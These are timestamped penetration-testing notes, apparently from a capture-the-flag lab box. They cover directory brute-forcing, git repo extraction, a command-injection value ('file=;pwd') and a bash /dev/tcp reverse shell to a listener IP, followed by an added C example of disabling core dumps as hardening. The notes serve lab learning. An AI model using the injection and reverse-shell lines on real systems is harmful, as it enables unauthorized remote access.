Reading the coredump was fun, but reading the long linpeas.sh result was a pain.
To get the coredump, I learned about the kill option.
02:57 feroxbuster
feroxbuster -u http://10.10.11.120 --force-recursion -C 404,405 -m GET,POST
The above returned too many results, so I decided to focus on the API.
feroxbuster -u http://10.10.11.120/api --force-recursion -C 404,405
03:27 use GitTools/Extractor/extractor.sh
git clone https://github.com/internetwache/GitTools.git
/home/kali/workplace/GitTools/Extractor/extractor.sh local-web secret_git
04:44 reverse shell
file=;pwd
“;” is a shell command separator: the command before it ends there, and whatever follows runs as a new command.
bash -c 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'
Special characters were URL-encoded before sending.
05:25 Getting coredump
reference here
SIGSEGV – 11 – Core: it is mainly useful for creating a core dump file
reference here
PR_SET_DUMPABLE
Set the state of the “dumpable” attribute, which determines whether core dumps are produced for the calling process upon delivery of a signal whose default behavior is to produce a core dump.
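The same attribute is the defensive control: a process that holds secrets in memory can clear it so that SIGSEGV leaves no core file behind. The following is an added example, not code from the original notes; the function names `disable_core_dumps` and `crash_child` are hypothetical, and it is Linux-only.

```c
/* Added example (hypothetical names): dumpable attribute vs. SIGSEGV core dumps. */
#define _DEFAULT_SOURCE
#include <signal.h>
#include <stdio.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef WCOREDUMP               /* hidden by strict -std=c11 builds */
#define WCOREDUMP(s) ((s) & 0x80)
#endif

/* Hardening for a process holding secrets: no core file, dumpable = 0.
 * Returns the resulting PR_GET_DUMPABLE value (0 on success), -1 on error. */
int disable_core_dumps(void)
{
    struct rlimit none = { 0, 0 };
    if (setrlimit(RLIMIT_CORE, &none) != 0) return -1;
    if (prctl(PR_SET_DUMPABLE, 0UL, 0UL, 0UL, 0UL) != 0) return -1;
    return prctl(PR_GET_DUMPABLE);
}

/* Fork a child, set its dumpable attribute, deliver SIGSEGV to it. Returns 1 if
 * a core dump was reported, 0 if not, -1 on error; *sig gets the signal number. */
int crash_child(int dumpable, int *sig)
{
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        signal(SIGSEGV, SIG_DFL);            /* default action: Core */
        prctl(PR_SET_DUMPABLE, (unsigned long)dumpable, 0UL, 0UL, 0UL);
        raise(SIGSEGV);
        _exit(1);                            /* not reached */
    }
    if (waitpid(pid, &status, 0) != pid || !WIFSIGNALED(status)) return -1;
    *sig = WTERMSIG(status);
    return WCOREDUMP(status) ? 1 : 0;
}

int main(void)
{
    int sig = 0;
    /* dumpable=1 only yields a core if RLIMIT_CORE/core_pattern allow it */
    printf("dumpable=1 core=%d\n", crash_child(1, &sig));
    printf("dumpable=0 core=%d\n", crash_child(0, &sig));
    printf("after hardening dumpable=%d\n", disable_core_dumps());
}
```

With dumpable set to 0 the child still dies from signal 11, but the kernel never reports a core dump, whatever the core size limit or core_pattern on the host.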
How to read crashed coredump:
Ubuntu – How to read a crash file from /var/crash – Unix Server Solutions